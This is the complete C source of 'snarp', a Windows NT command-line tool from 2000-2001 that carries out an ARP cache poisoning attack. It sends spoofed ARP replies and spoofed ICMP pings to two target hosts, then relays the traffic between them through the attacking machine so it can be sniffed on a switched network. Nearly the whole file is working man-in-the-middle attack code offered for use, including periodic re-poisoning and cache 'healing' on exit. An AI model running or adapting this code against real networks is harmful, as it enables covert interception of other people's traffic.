//	Project:		snarp

#define	myversion	"0.9h"

/*	Description:	snarp poisens the ARP cache of two machines and forwards traffic
					between them. This will allow sniffing of packets using tcpdump,
					ngrep, dsniff, etc, on a switched network.

	Author:			Frank Knobbe
	Requirements:	LibNet DLL and PCap driver for NT.

	To Do:			Add ICMP redirect as additional/alternative means of redirecting.

	Notes:			libnet_write_ip crashes under W2K... I need help on this one...

	
	

*/

//#define	debugme	please	

#include <stdio.h>
#include <winsock.h>
#include <stdlib.h>
#include <time.h>
#include <conio.h>
#include <pcap.h>
#include <libnet.h>


#undef	FALSE
#undef	TRUE
#define	FALSE	0
#define	TRUE	!FALSE

#define DEFOUT	stdout

#define safecpy(dst,src) nstrncpy(dst,src,sizeof(dst)-1)



// unsigned char etherbcast[6]={0xff, 0xff, 0xff, 0xff, 0xff, 0xff};
int verbose=FALSE,mydevice=0,fakeping=TRUE,winsockinit=FALSE;
char *myinterface=NULL,errbuf[512]="";
struct myhoststruct 
{	char fqdn[256];
	char ipstr[18];
	struct in_addr ipaddr;
	struct ether_addr macaddr;
}	targeta,targetb,myhost;
struct WSAData wsad;
struct libnet_link_int *netlink;
unsigned long interval=10000;


unsigned int nstrlen(char *str)
{	unsigned long l=0;

	while(*str++)
		l++;
	return l;
}

void nstrcat(char *dest, char *src)
{	unsigned long l;

	l=nstrlen(dest);
	dest+=l;
	while(*src)
		*dest++ = *src++;
	*dest=0;
}

void nstrncat(char *dest, char *src,unsigned long len)
{	unsigned long l;

	l=nstrlen(dest);
	dest+=l;
	while(*src && len>0)
	{	*dest++ = *src++;
		len--;
	}
	*dest=0;
}

void nstrcpy(char *dest, char *src)
{	while(*src)
		*dest++ = *src++;
	*dest=0;
}

void nstrncpy(char *dest, char *src,unsigned long len)
{	while(*src && len>0)
	{	*dest++ = *src++;
		len--;
	}
	*dest=0;
}

void lowstring(char *str)
{	while(*str)
	{	if(*str>='A' && *str<='Z')
			*str=*str+'a'-'A';
		str++;
	}
}

void truncstr(unsigned char *str)
{	unsigned char *po,*s;
	unsigned long i;

	s=po=str;
	while(isspace(*po) || *po<=32)
		po++;
	do
		*s++ =*po;
	while(*po++);
	if(*str)
	{	i=nstrlen(str)-1;
		while((*(str+i)<=32 || isspace(*(str+i))) && i>0)
			i--;
		if(++i<0)
			i=0;
		*(str+i)=0;
	}
}


int strstart(char *bigs,char *smalls)
{	unsigned long l,i=0;
	int same=TRUE;
	char b,s;

	l=nstrlen(smalls);
	while(same && i<l && *(bigs+i))
	{	b=*(bigs+i); s=*(smalls+i);
		if(b>='A' && b<='Z')
			b=b+'a'-'A';
		if(s>='A' && s<='Z')
			s=s+'a'-'A';

		if(b!=s)
			same=FALSE;
		i++;
	}
	return same;
}

int isin(char *str,char c)
{	int f=FALSE;

	while(*str)
	{	if(*str==c)
			f=TRUE;
		str++;
	}
	return f;
}

void usage(void)
{	fprintf(DEFOUT,"Usage: snarp [-d 1 -l -i 5 -p 1 -v -?] host1 host2\n\n");
	fprintf(DEFOUT," -d      Device (interface) to be used. (Default: 1)\n");
	fprintf(DEFOUT," -l      Lists available devices.\n");
	fprintf(DEFOUT," -i      Interval in secs for repeated ARP poison packets. (Default: 10 secs.)\n");
	fprintf(DEFOUT," -p      Value 0 or 1: 1 sends a spoofed ping between hosts before the ARP\n");
	fprintf(DEFOUT,"                       cache is poisened and waits a second. (Default: 1)\n");
	fprintf(DEFOUT," -v      Verbose output. Prints all host data and indicates packet flow.\n");
	fprintf(DEFOUT," -h, -?  This text.\n");
	fprintf(DEFOUT," host    IP address or hostname (or FQDN) of the hosts to be attacked.\n");
}

void getout(void)
{
	if(winsockinit)
		WSACleanup();
	if(*errbuf)
		fprintf(DEFOUT,errbuf);
//	exit(EXIT_SUCCESS);  W2K seems to crash on EXIT_FAILURE
	exit(EXIT_FAILURE);
}

void resolve(struct myhoststruct *p,char *what)
{	struct hostent *hostp;
	struct in_addr addr;

	
	addr.S_un.S_addr=inet_addr(what);
	if(addr.S_un.S_addr==INADDR_NONE)
	{	hostp=gethostbyname(what);
		if(hostp==NULL)
		{	sprintf(errbuf,"\nCould not resolve host %s!\n",what);
			getout();
		}
		memcpy(&(p->ipaddr),hostp->h_addr,hostp->h_length);
		safecpy(p->fqdn,hostp->h_name);
	}
	else
	{	memcpy((char *)&(p->ipaddr),(char *)&(addr.S_un.S_addr),4);
		safecpy(p->fqdn,what);
	}
	safecpy(p->ipstr,inet_ntoa(p->ipaddr));

#if defined(debugme)
	fprintf(DEFOUT,"\nDebug: Host: %s",p->fqdn);
	fprintf(DEFOUT,"\nDebug: IP  : %s\n",p->ipstr);
#endif
}

// Based on a rip from WinDump found in snort
void PrintDeviceList(const char* device)
{
	const WCHAR* t;
    int i=0,x;
    int DescPos=0;
    char *Desc;
    int n=1;

	fprintf(DEFOUT,"Available Interfaces (for -d option):\n\nI/F   Device\t\t      Description\n");
	for(x=0;x<65;x++) 
		fprintf(DEFOUT,"-");

	t=(WCHAR*)device;
	while(*(t+DescPos)!=0 || *(t+DescPos-1)!=0){
		DescPos++;
	}
	DescPos<<=1;
	Desc=(char*)t+DescPos+2;
	fprintf(DEFOUT,"\n%3d   ",n++);

	while (!(t[i]==0 && t[i-1]==0))
	{
		if (t[i]==0)
		{
			fprintf(DEFOUT," (");
			while(*Desc!=0){
				fprintf(DEFOUT,"%c",*Desc);
				Desc++;
			}
			Desc++;
			fprintf(DEFOUT,")\n");
		}
		else fprintf(DEFOUT,"%c",t[i]);

		if(t[i]==0 && t[i+1]!=0)
			fprintf(DEFOUT,"\n%3d   ",n++);
		i++;
	}
	fprintf(DEFOUT,"\n");
}

void *GetAdapterFromList(void *device,int index) 
{	WCHAR *Adapter;
    int i;

	Adapter=(WCHAR *)device;
	for(i = 0;i < index - 1; i++){
		while(*Adapter++ != 0);
		if(*Adapter == 0)
			return NULL;
	}
	return  Adapter;
}

void getmacs(struct myhoststruct *host)
{	int i,len,sock;
	unsigned char *pout,*pin;
	pcap_t *pd;
	struct pcap_pkthdr phdr;
	struct libnet_ethernet_hdr *etherhdr;
	struct libnet_ip_hdr *iphdr;

	pd=pcap_open_live(myinterface,ETH_H+IP_H+ICMP_UNREACH_H,1,500,errbuf);
	if(pd==NULL)
		getout();
	if((sock=libnet_open_raw_sock(IPPROTO_RAW))== -1)
		getout();

	len=IP_H+ICMP_UNREACH+IP_H;
//	if((pout=malloc(len+2000))==NULL)
    if(libnet_init_packet(len+2000,&pout)== -1)
		getout();
    memset(pout,0,len);
    libnet_build_ip(ICMP_UNREACH_H,
					0,   // TOS
					rand()+rand(), // IP ID
                    0, // fragmentation 
					254, // 
					IPPROTO_ICMP,
                    myhost.ipaddr.s_addr,
					host->ipaddr.s_addr,
					NULL,0,pout);

	libnet_build_icmp_unreach(ICMP_UNREACH,ICMP_UNREACH_PORT,0,0,0,0,0,0,0,0,NULL,0,pout+IP_H);

	libnet_do_checksum(pout,IPPROTO_ICMP,ICMP_UNREACH+IP_H);
	libnet_do_checksum(pout,IPPROTO_IP,IP_H);

	if(libnet_write_ip(sock,pout,len)<len)
		getout();

	i=TRUE;
	while((pin=pcap_next(pd,&phdr))!=NULL && i)
	{	etherhdr=(struct libnet_ethernet_hdr *)pin;
		if(ntohs(etherhdr->ether_type)==ETHERTYPE_IP)
		{	iphdr=(struct libnet_ip_hdr *)(pin+LIBNET_ETH_H);
			if((iphdr->ip_src.s_addr==myhost.ipaddr.s_addr) && (iphdr->ip_dst.s_addr==host->ipaddr.s_addr))
			{	memcpy(&myhost.macaddr,etherhdr->ether_shost,ETHER_ADDR_LEN);
				memcpy(&(host->macaddr),etherhdr->ether_dhost,ETHER_ADDR_LEN);
#ifdef debugme
				fprintf(DEFOUT,"\nDebug: %s has MAC addr: ",myhost.fqdn);
				for(i=0;i<6;i++)
					fprintf(DEFOUT,(i<5)?"%02x-":"%02x",myhost.macaddr.ether_addr_octet[i]);
				fprintf(DEFOUT,"\n");
				fprintf(DEFOUT,"\nDebug: %s has MAC addr: ",host->fqdn);
				for(i=0;i<6;i++)
					fprintf(DEFOUT,(i<5)?"%02x-":"%02x",host->macaddr.ether_addr_octet[i]);
				fprintf(DEFOUT,"\n");
#endif
				i=FALSE;
			}

		}
	}
	pcap_close(pd);
	libnet_close_raw_sock(sock);
	libnet_destroy_packet(&pout);
//	free(pout);
}

void showaddr(char *h,struct myhoststruct *host)
{	int i;

	fprintf(DEFOUT,"%s  ",h);
	for(i=0;i<6;i++)
		fprintf(DEFOUT,(i<5)?"%02x-":"%02x",host->macaddr.ether_addr_octet[i]);
	fprintf(DEFOUT,"  %s [%s]\n",host->fqdn,host->ipstr);
}

int ethercomp(unsigned char *val1,unsigned char *val2)
{	int i;

	for(i=0;i<ETHER_ADDR_LEN;i++)
		if(*(val1++)!=*(val2++))
			return FALSE;
	return TRUE;
}

void spoofping(struct myhoststruct *source,struct myhoststruct *dest)
{	unsigned char *p;
	unsigned int len;

	len=ETH_H+IP_H+ICMP_ECHO_H+32;
    if(libnet_init_packet(len+2000,&p)== -1)
//	if((p=malloc(len))==NULL)
		getout();
    memset(p,0,len);

	libnet_build_ethernet(dest->macaddr.ether_addr_octet,
						myhost.macaddr.ether_addr_octet,
						ETHERTYPE_IP,
						NULL,0,p);
    libnet_build_ip(ICMP_ECHO_H+32,
					24,   // TOS
					rand()+rand(), // IP ID
                    0, // fragmentation 
					254, // 
					IPPROTO_ICMP,
                    source->ipaddr.s_addr,
					dest->ipaddr.s_addr,
					NULL,0,p+ETH_H);

	libnet_build_icmp_echo(ICMP_ECHO,0,255,rand()+rand(),NULL,32,p+IP_H+ETH_H);

	libnet_do_checksum(p+ETH_H,IPPROTO_ICMP,ICMP_ECHO_H+32);
	libnet_do_checksum(p+ETH_H,IPPROTO_IP,IP_H);
	if(libnet_write_link_layer(netlink,myinterface,p,len)== -1)
		getout();
	libnet_destroy_packet(&p);
//	free(p);
#ifdef debugme
	fprintf(DEFOUT,"Poison %s\n",inet_ntoa(*((struct in_addr *)tip)));
#endif
}

void spoofarp(unsigned char *smac,unsigned char *sip,unsigned char *tmac,unsigned char *tip)
{	unsigned char *p;

    if(libnet_init_packet(ETH_H+ARP_H+2000,&p)== -1)
		getout();
//	if((p=malloc(ETH_H+ARP_H))==NULL)

	libnet_build_ethernet(tmac,
						myhost.macaddr.ether_addr_octet,
						ETHERTYPE_ARP,
						NULL,0,p);
	libnet_build_arp(ARPHRD_ETHER,
					ETHERTYPE_IP,
					ETHER_ADDR_LEN,
					4,
					ARPOP_REPLY,
					smac,
					sip,
					tmac,
					tip,
					NULL,0,p+ETH_H);
	if(libnet_write_link_layer(netlink,myinterface,p,ETH_H+ARP_H)== -1)
		getout();
	libnet_destroy_packet(&p);
//	free(p);
#ifdef debugme
	fprintf(DEFOUT,"Poison %s\n",inet_ntoa(*((struct in_addr *)tip)));
#endif
}

void poison(void)
{	spoofarp(myhost.macaddr.ether_addr_octet,(unsigned char *)&(targetb.ipaddr.s_addr),
			targeta.macaddr.ether_addr_octet,(unsigned char *)&(targeta.ipaddr.s_addr));
	spoofarp(myhost.macaddr.ether_addr_octet,(unsigned char *)&(targeta.ipaddr.s_addr),
			targetb.macaddr.ether_addr_octet,(unsigned char *)&(targetb.ipaddr.s_addr));
}

void heal(void)
{	spoofarp(targetb.macaddr.ether_addr_octet,(unsigned char *)&(targetb.ipaddr.s_addr),
			targeta.macaddr.ether_addr_octet,(unsigned char *)&(targeta.ipaddr.s_addr));
	spoofarp(targeta.macaddr.ether_addr_octet,(unsigned char *)&(targeta.ipaddr.s_addr),
			targetb.macaddr.ether_addr_octet,(unsigned char *)&(targetb.ipaddr.s_addr));
}

void relay(unsigned char *pin,unsigned long len)
{	struct libnet_ethernet_hdr *etherhdr;
	struct libnet_ip_hdr *iphdr;

	etherhdr=(struct libnet_ethernet_hdr *)pin;
	if(ntohs(etherhdr->ether_type)==ETHERTYPE_IP && ethercomp(etherhdr->ether_dhost,myhost.macaddr.ether_addr_octet))
	{	iphdr=(struct libnet_ip_hdr *)(pin+LIBNET_ETH_H);
		if((iphdr->ip_src.s_addr==targeta.ipaddr.s_addr) && (iphdr->ip_dst.s_addr==targetb.ipaddr.s_addr))
		{ //relay from a to b
			memcpy(etherhdr->ether_dhost,targetb.macaddr.ether_addr_octet,ETHER_ADDR_LEN);
			memcpy(etherhdr->ether_shost,myhost.macaddr.ether_addr_octet,ETHER_ADDR_LEN);
			libnet_write_link_layer(netlink,myinterface,pin,len);
			if(verbose)
				fprintf(DEFOUT,">");

		}
		else if((iphdr->ip_src.s_addr==targetb.ipaddr.s_addr) && (iphdr->ip_dst.s_addr==targeta.ipaddr.s_addr))
		{ //relay from b to a
			memcpy(etherhdr->ether_dhost,targeta.macaddr.ether_addr_octet,ETHER_ADDR_LEN);
			memcpy(etherhdr->ether_shost,myhost.macaddr.ether_addr_octet,ETHER_ADDR_LEN);
			libnet_write_link_layer(netlink,myinterface,pin,len);
			if(verbose)
				fprintf(DEFOUT,"<");
		}
	}
}

int main(int argc,char *argv[])
{	int i,bigloop=TRUE;
	DWORD dwVersion,dwWindowsMajorVersion;
	char buf[256];
	unsigned char *p,*pin;
	struct hostent *hostp;
	pcap_t *pd;
	struct pcap_pkthdr phdr;
	clock_t ticker,oldticker,orgticker;



	fprintf(DEFOUT,"\nsnarp, v%s.     (c) 2000-2001 by Frank Knobbe.\n\n",myversion);

	dwVersion=GetVersion();
    dwWindowsMajorVersion =  (DWORD)(LOBYTE(LOWORD(dwVersion)));

	if (dwVersion >= 0x80000000 || dwWindowsMajorVersion >4)
	{	if(dwVersion>=0x80000000)
			fprintf(DEFOUT,"Snarp is not supported under Windows 9x due to use of LibNetNT.\n");
		else
			fprintf(DEFOUT,"Snarp does not run under Windows 2000 yet due to problems with LibNetNT.\n");
		exit(EXIT_SUCCESS);
	}

	srand(time(NULL));

	if(argc<=1)
	{	usage();
		exit(EXIT_SUCCESS);
	}

	for(i=1;i<argc;i++)
	{	safecpy(buf,argv[i]);
		truncstr(buf); 
		lowstring(buf);

		if(!strcmp(buf,"-v"))
		{	verbose=TRUE;
		}
		else if(!strcmp(buf,"-d"))
		{	if(i+1<argc)
			{	mydevice=atoi(argv[++i]);
				if(mydevice>0)
					fprintf(DEFOUT,"Interface set to %d.\n",mydevice);
				else
				{	fprintf(DEFOUT,"Invalid interface specified. Defaulting to interface 1.\n");
					mydevice=1;
				}
			}
		}
		else if(!strcmp(buf,"-?") || !strcmp(buf,"-h"))
		{	usage();
			*errbuf=0;
			getout();
		}
		else if(!strcmp(buf,"-l"))
		{	if ((p = pcap_lookupdev(errbuf)) == NULL)
				getout();
			PrintDeviceList(p);
			*errbuf=0;
			getout();
		}
		else if(!strcmp(buf,"-p"))
		{	if(i+1<argc)
				fakeping=atoi(argv[++i]);
			else
				fakeping=TRUE;
		}
		else if(!strcmp(buf,"-i"))
		{	if(i+1<argc)
				interval=atol(argv[++i])*1000;
			else
				interval=0;
			if(interval==0)
				fprintf(DEFOUT,"Repeated ARP'ing disabled.\n");
		}
		else
		{	if(!*targeta.fqdn)
				safecpy(targeta.fqdn,argv[i]);
			else if(!*targetb.fqdn)
				safecpy(targetb.fqdn,argv[i]);
			else
				fprintf(DEFOUT,"Ignoring host %s\n",argv[i]);
		}
	}
	if(WSAStartup(MAKEWORD(1,1),&wsad))
	{	fprintf(DEFOUT,"\nCould not initialize Winsock!\n");
		exit(EXIT_FAILURE);
	}
	winsockinit=TRUE;
	if(LOBYTE(wsad.wVersion)!=1 || HIBYTE(wsad.wVersion)!=1)
	{	sprintf(errbuf,"\nThis Winsock version is not supported!\n");
		getout();
	}

	if(!*targeta.fqdn || !*targetb.fqdn)
	{	sprintf(errbuf,"Not enough hosts specified. Exiting...\n");
		getout();
	}
	if((p=pcap_lookupdev(errbuf))==NULL)
		getout();
	if(mydevice==0)
	{	fprintf(DEFOUT,"No interface specified. Defaulting to interface 1.\n");
		mydevice=1;
	}
	myinterface=GetAdapterFromList(p,mydevice);
	if(myinterface==NULL)
	{	sprintf(errbuf,"Invalid or missing interface! See 'snarp -l' for a list of interfaces.\n");
		getout();
	}
	if(!*(myinterface+1))
	{	pin=myinterface+1;
		p=pin;
		while(*++pin)
			*p++= *pin++;
		*p=0;
	}

//  Crashes under Win2K... seems to run fine without it though...
	libnet_win32_init(mydevice);



/*	Why isn't this supported in NT?
	if((netlink=libnet_open_link_interface(myinterface,errbuf))==NULL)
		getout();
	eaddr=libnet_get_hwaddr(netlink,myinterface,errbuf);
	if(eaddr==NULL)
		getout();
	memcpy(&myhost.macaddr,&eaddr,sizeof(struct ether_addr));
	for(i=0;i<6;i++)
		fprintf(DEFOUT,(i<5)?"%x-":"%x",eaddr->ether_addr_octet[i]);
*/


	gethostname(buf,250);
	hostp=gethostbyname(buf);
	if(hostp==NULL)
	{	sprintf(errbuf,"\nNo local IP address???\n");
		getout();
	}

	resolve(&myhost,buf);
	resolve(&targeta,targeta.fqdn);
	resolve(&targetb,targetb.fqdn);

	getmacs(&targeta);
	getmacs(&targetb);

	if(verbose)
	{	fprintf(DEFOUT,"\nEstablished identities:\n\n");
		showaddr("This Host:",&myhost);
		showaddr("Target A :",&targeta);
		showaddr("Target B :",&targetb);
		fprintf(DEFOUT,"\n");
	}

//	*** Crashes under W2K but from what I read in the source of libnet,
//	it's not used in the w32 port anyway...I left it in since it is supposed to be there.

	netlink=libnet_open_link_interface(myinterface,errbuf);
	if(netlink==NULL)
		getout();  

	if(fakeping)
	{	fprintf(DEFOUT,"Sending spoofed ICMP ECHO between hosts first.\n");
		spoofping(&targeta,&targetb);
		if(verbose)
			fprintf(DEFOUT,"Ping...\n");
		Sleep(1000);
		spoofping(&targetb,&targeta);
		if(verbose)
			fprintf(DEFOUT,"Pong...\n");
		Sleep(1000);
	}

	fprintf(DEFOUT,"\nRedirecting traffic between %s and %s.\nPress ESC to abort...\n\n",targeta.fqdn,targetb.fqdn);

	pd=pcap_open_live(myinterface,IP_MAXPACKET,1,500,errbuf);
	if(pd==NULL)
		getout();
	
	poison();
	
	oldticker=clock();

	while(bigloop)
	{	if(kbhit())
		{	if((getch()&255)==27)
				bigloop=FALSE;
		}
		if(interval>0)
		{	ticker=clock();
			if(ticker-oldticker>interval)
			{	oldticker=ticker;
				poison();
			}
		}
		pin=pcap_next(pd,&phdr);
		if(pin==NULL)
			Sleep(2);
		else
			relay(pin,phdr.caplen);
	}
	bigloop=TRUE;

	heal();
	if(verbose)
		fprintf(DEFOUT,"\n\n");
	fprintf(DEFOUT,"Waiting for all traffic to return to normal...\n");
	oldticker=orgticker=clock();

	while(bigloop)
	{	ticker=clock();
		if(ticker-oldticker>interval && interval>0)
		{	oldticker=ticker;
			heal();
		}
		if(ticker-orgticker>10000)
			bigloop=FALSE;
		pin=pcap_next(pd,&phdr);
		if(pin==NULL)
		{	Sleep(50);
			pin=pcap_next(pd,&phdr);
		}
		if(pin==NULL)
		{	Sleep(50);
			pin=pcap_next(pd,&phdr);
		}
		if(pin==NULL)
		{	Sleep(50);
			pin=pcap_next(pd,&phdr);
		}
		if(pin==NULL)
		{	Sleep(50);
			pin=pcap_next(pd,&phdr);
		}
		if(pin==NULL)
			bigloop=FALSE;
		else
			relay(pin,phdr.caplen);
	}

	pcap_close(pd);
	libnet_close_link_interface(netlink);
	if(verbose)
		fprintf(DEFOUT,"\n\n");
	fprintf(DEFOUT,"Done.\n\n");

	return EXIT_SUCCESS;
}
